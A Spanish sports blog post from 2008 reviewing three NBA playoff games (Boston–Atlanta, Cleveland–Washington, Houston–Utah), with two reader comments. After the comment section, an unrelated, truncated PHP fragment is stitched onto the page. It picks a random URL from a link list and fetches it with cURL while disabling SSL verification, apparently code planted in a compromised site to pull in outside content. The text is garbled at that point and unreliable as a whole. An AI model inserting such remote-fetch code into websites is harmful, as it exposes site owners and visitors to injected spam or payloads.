Noche de contrastes

03 de May de 2008 por Viva_Dirk

By TheDeerHunter&Viva_Dirk

Sudar la (verde) camiseta (BOS 100 – ATL 103)

Quién iba a pensar lo mal que lo está pasando Boston en esta eliminatoria. Los primeros partidos ganando fácil y dando descanso al Big Three. De pensar que iba a ser un paseo en barca, de repente se encuentran en medio de la madre de todas las batallas, dejandose la piel en la cancha y con sus estrellas jugando todos los minutos del mundo contra un equipo de chavales que les están dando por todos los lados… Ahora llega el séptimo partido y es cuando uno es consciente de lo que pesa el Trébol, de lo que pesa la historia, el favoritismo… todo.

Los Hawks, sin embargo, no tienen nada que perder porque ya lo habían perdido todo cuando comenzó la eliminatoria y cada partido que pasa están jugando mejor. Anoche en Atlanta las metía hasta el utillero. Hasta 6 jugadores hicieron dobles figuras y no fueron 7 de milagro. Los Celtics se dejaron la vida para ganar, pero no pudieron. Es lo peor de todo, que con lo buenos que son se dejaron la vida y, a pesar de todo, perdieron.

Ahora se lo juegan todo a un partido. Es cierto que cualquier equipo del mundo firmaría por jugar ese partido decisivo en su casa, sobre todo si esa casa se llama “The Garden”. Sin embargo en este caso, ver todas esas camisetas colgadas va a ser un trago difícil… Todo depende de cómo los Celtics sepan manejar su propia ansiedad. Ellos son los favoritos. Deben de ganar sí o sí… pero cuidado, el partido hay que jugarlo y los Hawks parece que no están muy por la labor de hacer regalitos.

Cerrando bocas (CLE 105 – WAS 88)

Con otro majestuoso partido, The King Lebron logra librarse por fin de los molestos Wizards. La reprobable táctica de insultar y castigar de todas las formas posibles a la estrella de los Cavaliers se ha demostrado completamente inútil. No es sólo que Lebron ha seguido haciendo números extraordinarios durante toda la eliminatoria sino que, con la sanción disciplinaria a Songaila por golpearle, se les ha vuelto finalmente en su contra. Les está bien empleado.

Todavía se preguntan qué es lo que hubiera pasado de haber podido contar con el ruso y también con el Agente Zero en este decisivo encuentro… pero lo cierto es que si hubieran prestado más esfuerzo en jugar su baloncesto que en tratar de marear a Lebrón otro pelo les hubiera corrido.

Anoche no hubo partido más allá del primer cuarto. “El elegido” logró en esta ocasión involucrar a varios de sus compañeros. Él sólo dió más asistencias que todo el equipo rival. Wally Szczerbiak logró batir su récord en Playoffs y junto a Gibson acribillaron a Wizards a base de “triplacos”. Ilgauskas, como es habitual, también aportó sus puntos. A bien seguro que Lebrón necesitará que sus compañeros den un paso adelante en la próxima eliminatoria.

Un final conocido (HOU 91 – UTA 113)

Ayer acabó la aventura de los Rockets en estos Playoffs, para T-Mac un nuevo final en primera ronda, lo único que conoce de la Post temporada. Es de nuevo un final conocido, porque Tracy ha acabado esta serie con 27 puntos, 8 rebotes y casi 7 asistencias y sus posibilidades de pasar han sido lejanas en todo momento. Sin Yao Ming volviamos a estar ante el ‘llanero solitario’, incapaz de pasar de primera ronda partiendo como favorito o dando la sorpresa, el final ha sido el mismo de siempre.

Este 6º partido ha resultado sorprendentemente plácido para Utah, con Deron Williams campando a sus anchas, repartiendo juego y anotando de forma salvaje desde la linea de triple. Solo contaron con la oposición del ya mencionado McGrady y de Luis Scola, y si eso es todo lo que tiene en frente un equipo con los recursos de los Jazz, te ganan de 20.

Mirando la siguiente ronda, Sloan parece haber recuperado mínimamente a Kirilenko que es una factor para el que los Lakers tienen dificil remedio sin Bynum en la pista y con Odom de ala-pivot. Deron está como nunca de cara al aro y resulta imparable para Fisher, y la batalla interior de Boozer&Okur con Gasol&Odom deben ganarla en ataque, ya que en defensa, ninguno de los 2 se ha mostrado nunca capaz de frenar a pívots de semejantes características. A Brewer le va a tocar bailar con la mas fea, por físico es el único que podria frenar los arreones de Kobe, si es que no lo hace Kirilenko.

A los Rockets no les queda otra que esperar al chino y ver si tienen que darle un trato especial para evitar sus ausencias prolongadas, y esperar que no se convierta en la siguiente excusa del ‘llanero solitario’.

Comenta

2 comentarios a esta entrada

  1. Gallis dice:
    #1

    Joer, quién se iba a esperar que los Celtics sufrieran tanto…lo suyo es que acaben pasando, pero esto les puede generar muchas dudas…y esperan los Cavs. Tela.

    Y ya pase lo que pase, el listón para la temporada que viene de los Hawks está muy alto. Si Horford va en serio, hay mucho equipo.

      Citar

  2. Viva_Dirk dice:
    #2

    Los Hawks tienen que renovar a Josh Smith y Josh Childress, veremos si optan por renovar a ambos, porque seguramente Smith se vaya al máximo o casi, y Childress también tendrá pretendientes. Si el dueño quiere gastarse la pasta hay equipo, porque al siguiente pasará Marvin Williams por caja.

    Los Hawks molan.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>